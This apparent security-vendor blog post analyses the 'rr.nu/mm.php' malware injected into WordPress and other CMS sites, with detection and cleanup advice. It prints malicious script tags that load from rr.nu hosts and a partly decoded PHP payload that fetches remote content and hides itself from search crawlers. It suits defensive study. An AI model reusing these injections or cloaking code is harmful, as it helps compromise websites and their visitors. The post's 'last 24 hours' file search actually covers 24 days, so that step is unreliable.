• How to Deal with the Latest WordPress Outbreak?

    Malicious hackers are finding new ways to compromise legitimate, benign websites with web malware. The goal of this post is to highlight a long running saga of a specific kind of malware injection, which we’re calling the “rr.nu/mm.php” variety.

    This specific variety of malware has very poor detection rates when Anti Virus programs are used to scan webpages, however it is caught quite successfully by more advanced AI based systems. StopTheHacker customers can lean back a bit, as they are safe because our systems automatically detected  and  removed (if you signed up for Automatic Cleanup) this malware.

    This article describes the history of this specific infection, code samples, and how to find out if your website is infected with the “rr.nu/mm.php” variety of web-malware and how to clean it up and protect your site.

    What is this “rr.nu/mm.php” malware?
    The “rr.nu/mm.php” variety of web malware is a family of infections.

    An example:

    <script src="http://irstde24clined.rr.nu/mm.php?d=1"></script>
    

    Many more (not a complete list):

    <script src="http://deunce68rtaint.rr.nu/mm.php?d=1"></script>
    <script src="http://rie21rcom.rr.nu/mm.php?d=1"></script>
    <script src="http://tarian13cheese.rr.nu/mm.php?d=1"></script>
    <script src="http://ive49scor.rr.nu/mm.php?d=1"></script>
    <script src="http://laprot98ocolle.rr.nu/mm.php?d=1"></script>
    

    Indications of infection
    This family of infections has one obvious characteristic: the malicious website that the malware is loaded from ends in “.rr.nu/mm.php?d=1″. The first recorded infection of this type by our systems was in 2010, hence this is not a new infection.

    This infection is related to the recent news of more than 30,000 wordpress sites being hacked, as reported by Websense. Our estimates of the number of sites affected is much larger – close to 100,000 (if you consider the historical impact of this infection).

    This family of infections is not limited to sites having the characteristic “mm.php?d=1″ at the very end of the malware laced URL. There are exceptions.

    An example:

    
    http://proc30esso.rr.nu/n.php?h=1&s=mm
    
    

    Here the code is slightly different, this where traditional Anti Virus fail, since the signature for the piece of malware is different that what is expected.

    Is WordPress, Joomla, OSCommerce at fault?
    No. While WordPress, Joomla, Django, OSCommerce powered websites have all been recorded to have been infected with this family of web-malware, the web malware is injected into websites using many different vectors.

    • Stolen FTP password and username
    • SQL Injection vulnerabilities in forms
    • File inclusion vulnerabilities on servers

    WordPress, Joomla, DJango, OSCOmmerce are applications which power your website. As a website owners you should always update to the latest version of these applications as malicious hackers are constantly probing to find vulnerabilities in older versions of these pieces of software. The teams behind the software mentioned above are very diligent at patching and informing users about security issues and encouraging them to upgrade.

    What does this infection do?
    This family of infections does couple things:

    • Injects PHP based malware in the header and footer of all PHP files on a file system
    • Redirects visitors to fake sites to display fake Anti Virus ads

    As an example, when sites are infected with this family of malware, the PHP files (sometimes global.ini.php) on the hosting account are injected with PHP malware that looks like that below.

    <?php /**/ //eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl .. snipped
    

    This base64 encoded code decodes to:

    if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){  $_SERVER['mr_no']=1;
        if(!function_exists('mrobh')){    function get_tds_777($url){$content="";
    $content=@trycurl_777($url);
    if($content!==false)return $content;
    $content=@tryfile_777($url);
    if($content!==false)return $content;
    $content=@tryfopen_777($url);
    if($content!==false)return $content;
    $content=@tryfsockopen_777($url);
    if($content!==false)return $content;
    $content=@trysocket_777($url);
    if($content!==false)return $content;
    return '';
    }  function trycurl_777($url){if(function_exists('curl_init')===false)return false;
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL,$url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt ($ch, CURLOPT_HEADER, 0);
    $result = curl_exec ($ch);
    curl_close($ch);
    if ($result=="")return false;
    return $result;
    }  function tryfile_777($url){if(function_exists('file')===false)return false;
    $inc=@file($url);
    $buf=@implode('',$inc);
    if ($buf=="")return false;
    return $buf;
    }  function tryfopen_777($url){if(function_exists('fopen')===false)return false;
    ... snipped
    

    This code checks whether the web page is being requested by a search engine web-crawler:

    $ua=$_SERVER['HTTP_USER_AGENT'];
    if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;
    if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;
    

    It even checks whether the user viewing the webpage is a non-mac user (not running IE 7):

    if (is_msie_777($ua))$msie=1;
    $mac=0;
    if (is_mac_777($ua))$mac=1;
    if (($msie==0)&&($mac==0))$bot=1;
    

    These are all significant attempts the malware makes to hide itself.

    How can I identify this infection on my site?
    Check the HTML files on your website. Often, the web-malware is injected into the pages near the end of the page.

    An example:

    <script src="http://irstde24clined.rr.nu/mm.php?d=1"></script>
    </body>
    </html>
    

    You can also identify the PHP files on your system that have been changed in the last 24 hours:

    find . -mtime -24 -iname "*.php"
    

    How can I protect my site?
    You can protect your website by:

    • Running the latest version of the CMS, framework, or Shopping cart you use
    • Change your FTP password to something secure and do not store the passwords on your local computer (better still use SFTP or SSH)

      Read more best practices.

      Need more help?
      StopTheHacker customers have access to resources and services (like Automatic Cleanup) that protect them against these kind of threats and help them recover from compromises should they occur.

      If you would like more information on how to protect your website, please feel free to contact us. You can also visit our product page to protect your website right now.

      • [...] If you find this article interesting you also may want to check out this blog article “How to Deal with the Latest WordPress Outbreak?” [...]

        Posted by stopthehacker.com | Startup Security Checklist: Things You Should Do Before Launching Your Site on April 12th